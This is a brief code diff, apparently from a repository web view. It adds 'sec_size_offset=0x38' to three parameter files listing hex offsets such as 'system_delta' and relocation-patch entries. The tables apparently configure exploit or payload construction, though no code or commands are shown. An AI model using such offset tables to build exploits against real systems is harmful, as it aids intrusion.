@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3